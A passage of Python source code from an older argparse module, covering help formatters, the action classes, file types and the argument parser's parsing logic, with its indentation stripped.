get_metavar = self._metavar_formatter(action, default_metavar)
if action.nargs is None:
result = '%s' % get_metavar(1)
elif action.nargs == OPTIONAL:
result = '[%s]' % get_metavar(1)
elif action.nargs == ZERO_OR_MORE:
result = '[%s [%s ...]]' % get_metavar(2)
elif action.nargs == ONE_OR_MORE:
result = '%s [%s ...]' % get_metavar(2)
elif action.nargs == REMAINDER:
result = '...'
elif action.nargs == PARSER:
result = '%s ...' % get_metavar(1)
else:
formats = ['%s' for _ in range(action.nargs)]
result = ' '.join(formats) % get_metavar(action.nargs)
return result
def _expand_help(self, action):
params = dict(vars(action), prog=self._prog)
for name in list(params):
if params[name] is SUPPRESS:
del params[name]
for name in list(params):
if hasattr(params[name], '__name__'):
params[name] = params[name].__name__
if params.get('choices') is not None:
choices_str = ', '.join([str(c) for c in params['choices']])
params['choices'] = choices_str
return self._get_help_string(action) % params
def _iter_indented_subactions(self, action):
try:
get_subactions = action._get_subactions
except AttributeError:
pass
else:
self._indent()
for subaction in get_subactions():
yield subaction
self._dedent()
def _split_lines(self, text, width):
text = self._whitespace_matcher.sub(' ', text).strip()
return _textwrap.wrap(text, width)
def _fill_text(self, text, width, indent):
text = self._whitespace_matcher.sub(' ', text).strip()
return _textwrap.fill(text, width, initial_indent=indent,
subsequent_indent=indent)
def _get_help_string(self, action):
return action.help
class RawDescriptionHelpFormatter(HelpFormatter):
"""Help message formatter which retains any formatting in descriptions.
Only the name of this class is considered a public API. All the methods
provided by the class are considered an implementation detail.
"""
def _fill_text(self, text, width, indent):
return ''.join([indent + line for line in text.splitlines(True)])
class RawTextHelpFormatter(RawDescriptionHelpFormatter):
"""Help message formatter which retains formatting of all help text.
Only the name of this class is considered a public API. All the methods
provided by the class are considered an implementation detail.
"""
def _split_lines(self, text, width):
return text.splitlines()
class ArgumentDefaultsHelpFormatter(HelpFormatter):
"""Help message formatter which adds default values to argument help.
Only the name of this class is considered a public API. All the methods
provided by the class are considered an implementation detail.
"""
def _get_help_string(self, action):
help = action.help
if '%(default)' not in action.help:
if action.default is not SUPPRESS:
defaulting_nargs = [OPTIONAL, ZERO_OR_MORE]
if action.option_strings or action.nargs in defaulting_nargs:
help += ' (default: %(default)s)'
return help
# =====================
# Options and Arguments
# =====================
def _get_action_name(argument):
if argument is None:
return None
elif argument.option_strings:
return '/'.join(argument.option_strings)
elif argument.metavar not in (None, SUPPRESS):
return argument.metavar
elif argument.dest not in (None, SUPPRESS):
return argument.dest
else:
return None
class ArgumentError(Exception):
"""An error from creating or using an argument (optional or positional).
The string value of this exception is the message, augmented with
information about the argument that caused it.
"""
def __init__(self, argument, message):
self.argument_name = _get_action_name(argument)
self.message = message
def __str__(self):
if self.argument_name is None:
format = '%(message)s'
else:
format = 'argument %(argument_name)s: %(message)s'
return format % dict(message=self.message,
argument_name=self.argument_name)
class ArgumentTypeError(Exception):
"""An error from trying to convert a command line string to a type."""
pass
# ==============
# Action classes
# ==============
class Action(_AttributeHolder):
"""Information about how to convert command line strings to Python objects.
Action objects are used by an ArgumentParser to represent the information
needed to parse a single argument from one or more strings from the
command line. The keyword arguments to the Action constructor are also
all attributes of Action instances.
Keyword Arguments:
- option_strings -- A list of command-line option strings which
should be associated with this action.
- dest -- The name of the attribute to hold the created object(s)
- nargs -- The number of command-line arguments that should be
consumed. By default, one argument will be consumed and a single
value will be produced. Other values include:
- N (an integer) consumes N arguments (and produces a list)
- '?' consumes zero or one arguments
- '*' consumes zero or more arguments (and produces a list)
- '+' consumes one or more arguments (and produces a list)
Note that the difference between the default and nargs=1 is that
with the default, a single value will be produced, while with
nargs=1, a list containing a single value will be produced.
- const -- The value to be produced if the option is specified and the
option uses an action that takes no values.
- default -- The value to be produced if the option is not specified.
- type -- The type which the command-line arguments should be converted
to, should be one of 'string', 'int', 'float', 'complex' or a
callable object that accepts a single string argument. If None,
'string' is assumed.
- choices -- A container of values that should be allowed. If not None,
after a command-line argument has been converted to the appropriate
type, an exception will be raised if it is not a member of this
collection.
- required -- True if the action must always be specified at the
command line. This is only meaningful for optional command-line
arguments.
- help -- The help string describing the argument.
- metavar -- The name to be used for the option's argument with the
help string. If None, the 'dest' value will be used as the name.
"""
def __init__(self,
option_strings,
dest,
nargs=None,
const=None,
default=None,
type=None,
choices=None,
required=False,
help=None,
metavar=None):
self.option_strings = option_strings
self.dest = dest
self.nargs = nargs
self.const = const
self.default = default
self.type = type
self.choices = choices
self.required = required
self.help = help
self.metavar = metavar
def _get_kwargs(self):
names = [
'option_strings',
'dest',
'nargs',
'const',
'default',
'type',
'choices',
'help',
'metavar',
]
return [(name, getattr(self, name)) for name in names]
def __call__(self, parser, namespace, values, option_string=None):
raise NotImplementedError(_('.__call__() not defined'))
class _StoreAction(Action):
def __init__(self,
option_strings,
dest,
nargs=None,
const=None,
default=None,
type=None,
choices=None,
required=False,
help=None,
metavar=None):
if nargs == 0:
raise ValueError('nargs for store actions must be > 0; if you '
'have nothing to store, actions such as store '
'true or store const may be more appropriate')
if const is not None and nargs != OPTIONAL:
raise ValueError('nargs must be %r to supply const' % OPTIONAL)
super(_StoreAction, self).__init__(
option_strings=option_strings,
dest=dest,
nargs=nargs,
const=const,
default=default,
type=type,
choices=choices,
required=required,
help=help,
metavar=metavar)
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, values)
class _StoreConstAction(Action):
def __init__(self,
option_strings,
dest,
const,
default=None,
required=False,
help=None,
metavar=None):
super(_StoreConstAction, self).__init__(
option_strings=option_strings,
dest=dest,
nargs=0,
const=const,
default=default,
required=required,
help=help)
def __call__(self, parser, namespace, values, option_string=None):
setattr(namespace, self.dest, self.const)
class _StoreTrueAction(_StoreConstAction):
def __init__(self,
option_strings,
dest,
default=False,
required=False,
help=None):
super(_StoreTrueAction, self).__init__(
option_strings=option_strings,
dest=dest,
const=True,
default=default,
required=required,
help=help)
class _StoreFalseAction(_StoreConstAction):
def __init__(self,
option_strings,
dest,
default=True,
required=False,
help=None):
super(_StoreFalseAction, self).__init__(
option_strings=option_strings,
dest=dest,
const=False,
default=default,
required=required,
help=help)
class _AppendAction(Action):
def __init__(self,
option_strings,
dest,
nargs=None,
const=None,
default=None,
type=None,
choices=None,
required=False,
help=None,
metavar=None):
if nargs == 0:
raise ValueError('nargs for append actions must be > 0; if arg '
'strings are not supplying the value to append, '
'the append const action may be more appropriate')
if const is not None and nargs != OPTIONAL:
raise ValueError('nargs must be %r to supply const' % OPTIONAL)
super(_AppendAction, self).__init__(
option_strings=option_strings,
dest=dest,
nargs=nargs,
const=const,
default=default,
type=type,
choices=choices,
required=required,
help=help,
metavar=metavar)
def __call__(self, parser, namespace, values, option_string=None):
items = _copy.copy(_ensure_value(namespace, self.dest, []))
items.append(values)
setattr(namespace, self.dest, items)
class _AppendConstAction(Action):
def __init__(self,
option_strings,
dest,
const,
default=None,
required=False,
help=None,
metavar=None):
super(_AppendConstAction, self).__init__(
option_strings=option_strings,
dest=dest,
nargs=0,
const=const,
default=default,
required=required,
help=help,
metavar=metavar)
def __call__(self, parser, namespace, values, option_string=None):
items = _copy.copy(_ensure_value(namespace, self.dest, []))
items.append(self.const)
setattr(namespace, self.dest, items)
class _CountAction(Action):
def __init__(self,
option_strings,
dest,
default=None,
required=False,
help=None):
super(_CountAction, self).__init__(
option_strings=option_strings,
dest=dest,
nargs=0,
default=default,
required=required,
help=help)
def __call__(self, parser, namespace, values, option_string=None):
new_count = _ensure_value(namespace, self.dest, 0) + 1
setattr(namespace, self.dest, new_count)
class _HelpAction(Action):
def __init__(self,
option_strings,
dest=SUPPRESS,
default=SUPPRESS,
help=None):
super(_HelpAction, self).__init__(
option_strings=option_strings,
dest=dest,
default=default,
nargs=0,
help=help)
def __call__(self, parser, namespace, values, option_string=None):
parser.print_help()
parser.exit()
class _VersionAction(Action):
def __init__(self,
option_strings,
version=None,
dest=SUPPRESS,
default=SUPPRESS,
help="show program's version number and exit"):
super(_VersionAction, self).__init__(
option_strings=option_strings,
dest=dest,
default=default,
nargs=0,
help=help)
self.version = version
def __call__(self, parser, namespace, values, option_string=None):
version = self.version
if version is None:
version = parser.version
formatter = parser._get_formatter()
formatter.add_text(version)
parser.exit(message=formatter.format_help())
class _SubParsersAction(Action):
class _ChoicesPseudoAction(Action):
def __init__(self, name, help):
sup = super(_SubParsersAction._ChoicesPseudoAction, self)
sup.__init__(option_strings=[], dest=name, help=help)
def __init__(self,
option_strings,
prog,
parser_class,
dest=SUPPRESS,
help=None,
metavar=None):
self._prog_prefix = prog
self._parser_class = parser_class
self._name_parser_map = {}
self._choices_actions = []
super(_SubParsersAction, self).__init__(
option_strings=option_strings,
dest=dest,
nargs=PARSER,
choices=self._name_parser_map,
help=help,
metavar=metavar)
def add_parser(self, name, **kwargs):
# set prog from the existing prefix
if kwargs.get('prog') is None:
kwargs['prog'] = '%s %s' % (self._prog_prefix, name)
# create a pseudo-action to hold the choice help
if 'help' in kwargs:
help = kwargs.pop('help')
choice_action = self._ChoicesPseudoAction(name, help)
self._choices_actions.append(choice_action)
# create the parser and add it to the map
parser = self._parser_class(**kwargs)
self._name_parser_map[name] = parser
return parser
def _get_subactions(self):
return self._choices_actions
def __call__(self, parser, namespace, values, option_string=None):
parser_name = values[0]
arg_strings = values[1:]
# set the parser name if requested
if self.dest is not SUPPRESS:
setattr(namespace, self.dest, parser_name)
# select the parser
try:
parser = self._name_parser_map[parser_name]
except KeyError:
tup = parser_name, ', '.join(self._name_parser_map)
msg = _('unknown parser %r (choices: %s)' % tup)
raise ArgumentError(self, msg)
# parse all the remaining options into the namespace
# store any unrecognized options on the object, so that the top
# level parser can decide what to do with them
namespace, arg_strings = parser.parse_known_args(arg_strings, namespace)
if arg_strings:
vars(namespace).setdefault(_UNRECOGNIZED_ARGS_ATTR, [])
getattr(namespace, _UNRECOGNIZED_ARGS_ATTR).extend(arg_strings)
# ==============
# Type classes
# ==============
class FileType(object):
"""Factory for creating file object types
Instances of FileType are typically passed as type= arguments to the
ArgumentParser add_argument() method.
Keyword Arguments:
- mode -- A string indicating how the file is to be opened. Accepts the
same values as the builtin open() function.
- bufsize -- The file's desired buffer size. Accepts the same values as
the builtin open() function.
"""
def __init__(self, mode='r', bufsize=None):
self._mode = mode
self._bufsize = bufsize
def __call__(self, string):
# the special argument "-" means sys.std{in,out}
if string == '-':
if 'r' in self._mode:
return _sys.stdin
elif 'w' in self._mode:
return _sys.stdout
else:
msg = _('argument "-" with mode %r' % self._mode)
raise ValueError(msg)
# all other arguments are used as file names
if self._bufsize:
return open(string, self._mode, self._bufsize)
else:
return open(string, self._mode)
def __repr__(self):
args = [self._mode, self._bufsize]
args_str = ', '.join([repr(arg) for arg in args if arg is not None])
return '%s(%s)' % (type(self).__name__, args_str)
# ===========================
# Optional and Positional Parsing
# ===========================
class Namespace(_AttributeHolder):
"""Simple object for storing attributes.
Implements equality by attribute names and values, and provides a simple
string representation.
"""
def __init__(self, **kwargs):
for name in kwargs:
setattr(self, name, kwargs[name])
__hash__ = None
def __eq__(self, other):
return vars(self) == vars(other)
def __ne__(self, other):
return not (self == other)
def __contains__(self, key):
return key in self.__dict__
class _ActionsContainer(object):
def __init__(self,
description,
prefix_chars,
argument_default,
conflict_handler):
super(_ActionsContainer, self).__init__()
self.description = description
self.argument_default = argument_default
self.prefix_chars = prefix_chars
self.conflict_handler = conflict_handler
# set up registries
self._registries = {}
# register actions
self.register('action', None, _StoreAction)
self.register('action', 'store', _StoreAction)
self.register('action', 'store_const', _StoreConstAction)
self.register('action', 'store_true', _StoreTrueAction)
self.register('action', 'store_false', _StoreFalseAction)
self.register('action', 'append', _AppendAction)
self.register('action', 'append_const', _AppendConstAction)
self.register('action', 'count', _CountAction)
self.register('action', 'help', _HelpAction)
self.register('action', 'version', _VersionAction)
self.register('action', 'parsers', _SubParsersAction)
# raise an exception if the conflict handler is invalid
self._get_handler()
# action storage
self._actions = []
self._option_string_actions = {}
# groups
self._action_groups = []
self._mutually_exclusive_groups = []
# defaults storage
self._defaults = {}
# determines whether an "option" looks like a negative number
self._negative_number_matcher = _re.compile(r'^-\d+$|^-\d*\.\d+$')
# whether or not there are any optionals that look like negative
# numbers -- uses a list so it can be shared and edited
self._has_negative_number_optionals = []
# ====================
# Registration methods
# ====================
def register(self, registry_name, value, object):
registry = self._registries.setdefault(registry_name, {})
registry[value] = object
def _registry_get(self, registry_name, value, default=None):
return self._registries[registry_name].get(value, default)
# ==================================
# Namespace default accessor methods
# ==================================
def set_defaults(self, **kwargs):
self._defaults.update(kwargs)
# if these defaults match any existing arguments, replace
# the previous default on the object with the new one
for action in self._actions:
if action.dest in kwargs:
action.default = kwargs[action.dest]
def get_default(self, dest):
for action in self._actions:
if action.dest == dest and action.default is not None:
return action.default
return self._defaults.get(dest, None)
# =======================
# Adding argument actions
# =======================
def add_argument(self, *args, **kwargs):
"""
add_argument(dest, ..., name=value, ...)
add_argument(option_string, option_string, ..., name=value, ...)
"""
# if no positional args are supplied or only one is supplied and
# it doesn't look like an option string, parse a positional
# argument
chars = self.prefix_chars
if not args or len(args) == 1 and args[0][0] not in chars:
if args and 'dest' in kwargs:
raise ValueError('dest supplied twice for positional argument')
kwargs = self._get_positional_kwargs(*args, **kwargs)
# otherwise, we're adding an optional argument
else:
kwargs = self._get_optional_kwargs(*args, **kwargs)
# if no default was supplied, use the parser-level default
if 'default' not in kwargs:
dest = kwargs['dest']
if dest in self._defaults:
kwargs['default'] = self._defaults[dest]
elif self.argument_default is not None:
kwargs['default'] = self.argument_default
# create the action object, and add it to the parser
action_class = self._pop_action_class(kwargs)
if not _callable(action_class):
raise ValueError('unknown action "%s"' % action_class)
action = action_class(**kwargs)
# raise an error if the action type is not callable
type_func = self._registry_get('type', action.type, action.type)
if not _callable(type_func):
raise ValueError('%r is not callable' % type_func)
return self._add_action(action)
def add_argument_group(self, *args, **kwargs):
group = _ArgumentGroup(self, *args, **kwargs)
self._action_groups.append(group)
return group
def add_mutually_exclusive_group(self, **kwargs):
group = _MutuallyExclusiveGroup(self, **kwargs)
self._mutually_exclusive_groups.append(group)
return group
def _add_action(self, action):
# resolve any conflicts
self._check_conflict(action)
# add to actions list
self._actions.append(action)
action.container = self
# index the action by any option strings it has
for option_string in action.option_strings:
self._option_string_actions[option_string] = action
# set the flag if any option strings look like negative numbers
for option_string in action.option_strings:
if self._negative_number_matcher.match(option_string):
if not self._has_negative_number_optionals:
self._has_negative_number_optionals.append(True)
# return the created action
return action
def _remove_action(self, action):
self._actions.remove(action)
def _add_container_actions(self, container):
# collect groups by titles
title_group_map = {}
for group in self._action_groups:
if group.title in title_group_map:
msg = _('cannot merge actions - two groups are named %r')
raise ValueError(msg % (group.title))
title_group_map[group.title] = group
# map each action to its group
group_map = {}
for group in container._action_groups:
# if a group with the title exists, use that, otherwise
# create a new group matching the container's group
if group.title not in title_group_map:
title_group_map[group.title] = self.add_argument_group(
title=group.title,
description=group.description,
conflict_handler=group.conflict_handler)
# map the actions to their new group
for action in group._group_actions:
group_map[action] = title_group_map[group.title]
# add container's mutually exclusive groups
# NOTE: if add_mutually_exclusive_group ever gains title= and
# description= then this code will need to be expanded as above
for group in container._mutually_exclusive_groups:
mutex_group = self.add_mutually_exclusive_group(
required=group.required)
# map the actions to their new mutex group
for action in group._group_actions:
group_map[action] = mutex_group
# add all actions to this container or their group
for action in container._actions:
group_map.get(action, self)._add_action(action)
def _get_positional_kwargs(self, dest, **kwargs):
# make sure required is not specified
if 'required' in kwargs:
msg = _("'required' is an invalid argument for positionals")
raise TypeError(msg)
# mark positional arguments as required if at least one is
# always required
if kwargs.get('nargs') not in [OPTIONAL, ZERO_OR_MORE]:
kwargs['required'] = True
if kwargs.get('nargs') == ZERO_OR_MORE and 'default' not in kwargs:
kwargs['required'] = True
# return the keyword arguments with no option strings
return dict(kwargs, dest=dest, option_strings=[])
def _get_optional_kwargs(self, *args, **kwargs):
# determine short and long option strings
option_strings = []
long_option_strings = []
for option_string in args:
# error on strings that don't start with an appropriate prefix
if not option_string[0] in self.prefix_chars:
msg = _('invalid option string %r: '
'must start with a character %r')
tup = option_string, self.prefix_chars
raise ValueError(msg % tup)
# strings starting with two prefix characters are long options
option_strings.append(option_string)
if option_string[0] in self.prefix_chars:
if len(option_string) > 1:
if option_string[1] in self.prefix_chars:
long_option_strings.append(option_string)
# infer destination, '--foo-bar' -> 'foo_bar' and '-x' -> 'x'
dest = kwargs.pop('dest', None)
if dest is None:
if long_option_strings:
dest_option_string = long_option_strings[0]
else:
dest_option_string = option_strings[0]
dest = dest_option_string.lstrip(self.prefix_chars)
if not dest:
msg = _('dest= is required for options like %r')
raise ValueError(msg % option_string)
dest = dest.replace('-', '_')
# return the updated keyword arguments
return dict(kwargs, dest=dest, option_strings=option_strings)
def _pop_action_class(self, kwargs, default=None):
action = kwargs.pop('action', default)
return self._registry_get('action', action, action)
def _get_handler(self):
# determine function from conflict handler string
handler_func_name = '_handle_conflict_%s' % self.conflict_handler
try:
return getattr(self, handler_func_name)
except AttributeError:
msg = _('invalid conflict_resolution value: %r')
raise ValueError(msg % self.conflict_handler)
def _check_conflict(self, action):
# find all options that conflict with this option
confl_optionals = []
for option_string in action.option_strings:
if option_string in self._option_string_actions:
confl_optional = self._option_string_actions[option_string]
confl_optionals.append((option_string, confl_optional))
# resolve any conflicts
if confl_optionals:
conflict_handler = self._get_handler()
conflict_handler(action, confl_optionals)
def _handle_conflict_error(self, action, conflicting_actions):
message = _('conflicting option string(s): %s')
conflict_string = ', '.join([option_string
for option_string, action
in conflicting_actions])
raise ArgumentError(action, message % conflict_string)
def _handle_conflict_resolve(self, action, conflicting_actions):
# remove all conflicting options
for option_string, action in conflicting_actions:
# remove the conflicting option
action.option_strings.remove(option_string)
self._option_string_actions.pop(option_string, None)
# if the option now has no option string, remove it from the
# container holding it
if not action.option_strings:
action.container._remove_action(action)
class _ArgumentGroup(_ActionsContainer):
def __init__(self, container, title=None, description=None, **kwargs):
# add any missing keyword arguments by checking the container
update = kwargs.setdefault
update('conflict_handler', container.conflict_handler)
update('prefix_chars', container.prefix_chars)
update('argument_default', container.argument_default)
super_init = super(_ArgumentGroup, self).__init__
super_init(description=description, **kwargs)
# group attributes
self.title = title
self._group_actions = []
# share most attributes with the container
self._registries = container._registries
self._actions = container._actions
self._option_string_actions = container._option_string_actions
self._defaults = container._defaults
self._has_negative_number_optionals = \
container._has_negative_number_optionals
def _add_action(self, action):
action = super(_ArgumentGroup, self)._add_action(action)
self._group_actions.append(action)
return action
def _remove_action(self, action):
super(_ArgumentGroup, self)._remove_action(action)
self._group_actions.remove(action)
class _MutuallyExclusiveGroup(_ArgumentGroup):
def __init__(self, container, required=False):
super(_MutuallyExclusiveGroup, self).__init__(container)
self.required = required
self._container = container
def _add_action(self, action):
if action.required:
msg = _('mutually exclusive arguments must be optional')
raise ValueError(msg)
action = self._container._add_action(action)
self._group_actions.append(action)
return action
def _remove_action(self, action):
self._container._remove_action(action)
self._group_actions.remove(action)
class ArgumentParser(_AttributeHolder, _ActionsContainer):
"""Object for parsing command line strings into Python objects.
Keyword Arguments:
- prog -- The name of the program (default: sys.argv[0])
- usage -- A usage message (default: auto-generated from arguments)
- description -- A description of what the program does
- epilog -- Text following the argument descriptions
- parents -- Parsers whose arguments should be copied into this one
- formatter_class -- HelpFormatter class for printing help messages
- prefix_chars -- Characters that prefix optional arguments
- fromfile_prefix_chars -- Characters that prefix files containing
additional arguments
- argument_default -- The default value for all arguments
- conflict_handler -- String indicating how to handle conflicts
- add_help -- Add a -h/-help option
"""
def __init__(self,
prog=None,
usage=None,
description=None,
epilog=None,
version=None,
parents=[],
formatter_class=HelpFormatter,
prefix_chars='-',
fromfile_prefix_chars=None,
argument_default=None,
conflict_handler='error',
add_help=True):
if version is not None:
import warnings
warnings.warn(
"""The "version" argument to ArgumentParser is deprecated. """
"""Please use """
""""add_argument(..., action='version', version="N", ...)" """
"""instead""", DeprecationWarning)
superinit = super(ArgumentParser, self).__init__
superinit(description=description,
prefix_chars=prefix_chars,
argument_default=argument_default,
conflict_handler=conflict_handler)
# default setting for prog
if prog is None:
prog = _os.path.basename(_sys.argv[0])
self.prog = prog
self.usage = usage
self.epilog = epilog
self.version = version
self.formatter_class = formatter_class
self.fromfile_prefix_chars = fromfile_prefix_chars
self.add_help = add_help
add_group = self.add_argument_group
self._positionals = add_group(_('positional arguments'))
self._optionals = add_group(_('optional arguments'))
self._subparsers = None
# register types
def identity(string):
return string
self.register('type', None, identity)
# add help and version arguments if necessary
# (using explicit default to override global argument_default)
if '-' in prefix_chars:
default_prefix = '-'
else:
default_prefix = prefix_chars[0]
if self.add_help:
self.add_argument(
default_prefix+'h', default_prefix*2+'help',
action='help', default=SUPPRESS,
help=_('show this help message and exit'))
if self.version:
self.add_argument(
default_prefix+'v', default_prefix*2+'version',
action='version', default=SUPPRESS,
version=self.version,
help=_("show program's version number and exit"))
# add parent arguments and defaults
for parent in parents:
self._add_container_actions(parent)
try:
defaults = parent._defaults
except AttributeError:
pass
else:
self._defaults.update(defaults)
# =======================
# Pretty __repr__ methods
# =======================
def _get_kwargs(self):
names = [
'prog',
'usage',
'description',
'version',
'formatter_class',
'conflict_handler',
'add_help',
]
return [(name, getattr(self, name)) for name in names]
# ==================================
# Optional/Positional adding methods
# ==================================
def add_subparsers(self, **kwargs):
if self._subparsers is not None:
self.error(_('cannot have multiple subparser arguments'))
# add the parser class to the arguments if it's not present
kwargs.setdefault('parser_class', type(self))
if 'title' in kwargs or 'description' in kwargs:
title = _(kwargs.pop('title', 'subcommands'))
description = _(kwargs.pop('description', None))
self._subparsers = self.add_argument_group(title, description)
else:
self._subparsers = self._positionals
# prog defaults to the usage message of this parser, skipping
# optional arguments and with no "usage:" prefix
if kwargs.get('prog') is None:
formatter = self._get_formatter()
positionals = self._get_positional_actions()
groups = self._mutually_exclusive_groups
formatter.add_usage(self.usage, positionals, groups, '')
kwargs['prog'] = formatter.format_help().strip()
# create the parsers action and add it to the positionals list
parsers_class = self._pop_action_class(kwargs, 'parsers')
action = parsers_class(option_strings=[], **kwargs)
self._subparsers._add_action(action)
# return the created parsers action
return action
def _add_action(self, action):
if action.option_strings:
self._optionals._add_action(action)
else:
self._positionals._add_action(action)
return action
def _get_optional_actions(self):
return [action
for action in self._actions
if action.option_strings]
def _get_positional_actions(self):
return [action
for action in self._actions
if not action.option_strings]
# =====================================
# Command line argument parsing methods
# =====================================
def parse_args(self, args=None, namespace=None):
args, argv = self.parse_known_args(args, namespace)
if argv:
msg = _('unrecognized arguments: %s')
self.error(msg % ' '.join(argv))
return args
def parse_known_args(self, args=None, namespace=None):
# args default to the system args
if args is None:
args = _sys.argv[1:]
# default Namespace built from parser defaults
if namespace is None:
namespace = Namespace()
# add any action defaults that aren't present
for action in self._actions:
if action.dest is not SUPPRESS:
if not hasattr(namespace, action.dest):
if action.default is not SUPPRESS:
default = action.default
if isinstance(action.default, basestring):
default = self._get_value(action, default)
setattr(namespace, action.dest, default)
# add any parser defaults that aren't present
for dest in self._defaults:
if not hasattr(namespace, dest):
setattr(namespace, dest, self._defaults[dest])
# parse the arguments and exit if there are any errors
try:
namespace, args = self._parse_known_args(args, namespace)
if hasattr(namespace, _UNRECOGNIZED_ARGS_ATTR):
args.extend(getattr(namespace, _UNRECOGNIZED_ARGS_ATTR))
delattr(namespace, _UNRECOGNIZED_ARGS_ATTR)
return namespace, args
except ArgumentError:
err = _sys.exc_info()[1]
self.error(str(err))
def _parse_known_args(self, arg_strings, namespace):
# replace arg strings that are file references
if self.fromfile_prefix_chars is not None:
arg_strings = self._read_args_from_files(arg_strings)
# map all mutually exclusive arguments to the other arguments
# they can't occur with
action_conflicts = {}
for mutex_group in self._mutually_exclusive_groups:
group_actions = mutex_group._group_actions
for i, mutex_action in enumerate(mutex_group._group_actions):
conflicts = action_conflicts.setdefault(mutex_action, [])
conflicts.extend(group_actions[:i])
conflicts.extend(group_actions[i + 1:])
# find all option indices, and determine the arg_string_pattern
# which has an 'O' if there is an option at an index,
# an 'A' if there is an argument, or a '-' if there is a '--'
option_string_indices = {}
arg_string_pattern_parts = []
arg_strings_iter = iter(arg_strings)
for i, arg_string in enumerate(arg_strings_iter):
# all args after -- are non-options
if arg_string == '--':
arg_string_pattern_parts.append('-')
for arg_string in arg_strings_iter:
arg_string_pattern_parts.append('A')
# otherwise, add the arg to the arg strings
# and note the index if it was an option
else:
option_tuple = self._parse_optional(arg_string)
if option_tuple is None:
pattern = 'A'
else:
option_string_indices[i] = option_tuple
pattern = 'O'
arg_string_pattern_parts.append(pattern)
# join the pieces together to form the pattern
arg_strings_pattern = ''.join(arg_string_pattern_parts)
# converts arg strings to the appropriate and then takes the action
seen_actions = set()
seen_non_default_actions = set()
def take_action(action, argument_strings, option_string=None):
seen_actions.add(action)
argument_values = self._get_values(action, argument_strings)
# error if this argument is not allowed with other previously
# seen arguments, assuming that actions that use the default
# value don't really count as "present"
if argument_values is not action.default:
seen_non_default_actions.add(action)
for conflict_action in action_conflicts.get(action, []):
if conflict_action in seen_non_default_actions:
msg = _('not allowed with argument %s')
action_name = _get_action_name(conflict_action)
raise ArgumentError(action, msg % action_name)
# take the action if we didn't receive a SUPPRESS value
# (e.g. from a default)
if argument_values is not SUPPRESS:
action(self, namespace, argument_values, option_string)
# function to convert arg_strings into an optional action
def consume_optional(start_index):
# get the optional identified at this index
option_tuple = option_string_indices[start_index]
action, option_string, explicit_arg = option_tuple
# identify additional optionals in the same arg string
# (e.g. -xyz is the same as -x -y -z if no args are required)
match_argument = self._match_argument
action_tuples = []
while True:
# if we found no optional action, skip it
if action is None:
extras.append(arg_strings[start_index])
return start_index + 1
# if there is an explicit argument, try to match the
# optional's string arguments to only this
if explicit_arg is not None:
arg_count = match_argument(action, 'A')
# if the action is a single-dash option and takes no
# arguments, try to parse more single-dash options out
# of the tail of the option string
chars = self.prefix_chars
if arg_count == 0 and option_string[1] not in chars:
action_tuples.append((action, [], option_string))
char = option_string[0]
option_string = char + explicit_arg[0]
new_explicit_arg = explicit_arg[1:] or None
optionals_map = self._option_string_actions
if option_string in optionals_map:
action = optionals_map[option_string]
explicit_arg = new_explicit_arg
else:
msg = _('ignored explicit argument %r')
raise ArgumentError(action, msg % explicit_arg)
# if the action expect exactly one argument, we've
# successfully matched the option; exit the loop
elif arg_count == 1:
stop = start_index + 1
args = [explicit_arg]
action_tuples.append((action, args, option_string))
break
# error if a double-dash option did not use the
# explicit argument
else:
msg = _('ignored explicit argument %r')
raise ArgumentError(action, msg % explicit_arg)
# if there is no explicit argument, try to match the
# optional's string arguments with the following strings
# if successful, exit the loop
else:
start = start_index + 1
selected_patterns = arg_strings_pattern[start:]
arg_count = match_argument(action, selected_patterns)
stop = start + arg_count
args = arg_strings[start:stop]
action_tuples.append((action, args, option_string))
break
# add the Optional to the list and return the index at which
# the Optional's string args stopped
assert action_tuples
for action, args, option_string in action_tuples:
take_action(action, args, option_string)
return stop
# the list of Positionals left to be parsed; this is modified
# by consume_positionals()
positionals = self._get_positional_actions()
# function to convert arg_strings into positional actions
def consume_positionals(start_index):
# match as many Positionals as possible
match_partial = self._match_arguments_partial
selected_pattern = arg_strings_pattern[start_index:]
arg_counts = match_partial(positionals, selected_pattern)
# slice off the appropriate arg strings for each Positional
# and add the Positional and its args to the list
for action, arg_count in zip(positionals, arg_counts):
args = arg_strings[start_index: start_index + arg_count]
start_index += arg_count
take_action(action, args)
# slice off the Positionals that we just parsed and return the
# index at which the Positionals' string args stopped
positionals[:] = positionals[len(arg_counts):]
return start_index
# consume Positionals and Optionals alternately, until we have
# passed the last option string
extras = []
start_index = 0
if option_string_indices:
max_option_string_index = max(option_string_indices)
else:
max_option_string_index = -1
while start_index <= max_option_string_index:
# consume any Positionals preceding the next option
next_option_string_index = min([
index
for index in option_string_indices
if index >= start_index])
if start_index != next_option_string_index:
positionals_end_index = consume_positionals(start_index)
# only try to parse the next optional if we didn't consume
# the option string during the positionals parsing
if positionals_end_index > start_index:
start_index = positionals_end_index
continue
else:
start_index = positionals_end_index
# if we consumed all the positionals we could and we're not
# at the index of an option string, there were extra arguments
if start_index not in option_string_indices:
strings = arg_strings[start_index:next_option_string_index]
extras.extend(strings)
start_index = next_option_string_index
# consume the next optional and any arguments for it
start_index = consume_optional(start_index)
# consume any positionals following the last Optional
stop_index = consume_positionals(start_index)
# if we didn't consume all the argument strings, there were extras
extras.extend(arg_strings[stop_index:])
# if we didn't use all the Positional objects, there were too few
# arg strings supplied.
if positionals:
self.error(_('too few arguments'))
# make sure all required actions were present
for action in self._actions:
if action.required:
if action not in seen_actions:
name = _get_action_name(action)
self.error(_('argument %s is required') % name)
# make sure all required groups had one option present
for group in self._mutually_exclusive_groups:
if group.required:
for action in group._group_actions:
if action in seen_non_default_actions:
break
# if no actions were used, report the error
else:
names = [_get_action_name(action)
for action in group._group_actions
if action.help is not SUPPRESS]
msg = _('one of the arguments %s is required')
self.error(msg % ' '.join(names))
# return the updated namespace and the extra arguments
return namespace, extras
def _read_args_from_files(self, arg_strings):
# expand arguments referencing files
new_arg_strings = []
for arg_string in arg_strings:
# for regular arguments, just add them back into the list
if arg_string[0] not in self.fromfile_prefix_chars:
new_arg_strings.append(arg_string)
# replace arguments referencing files with the file content
else:
try:
args_file = open(arg_string[1:])
try:
arg_strings = []
for arg_line in args_file.read().splitlines():
for arg in self.convert_arg_line_to_args(arg_line):
arg_strings.append(arg)
arg_strings = self._read_args_from_files(arg_strings)
new_arg_strings.extend(arg_strings)
finally:
args_file.close()
except IOError:
err = _sys.exc_info()[1]
self.error(str(err))
# return the modified argument list
return new_arg_strings
def convert_arg_line_to_args(self, arg_line):
return [arg_line]
def _match_argument(self, action, arg_strings_pattern):
